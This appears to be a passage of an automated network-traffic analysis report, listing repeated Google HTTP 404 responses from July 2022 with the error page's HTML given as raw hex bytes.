                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:57:43 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:57:45 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:57:46 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:57:48 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:57:49 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:57:50 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:57:53 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 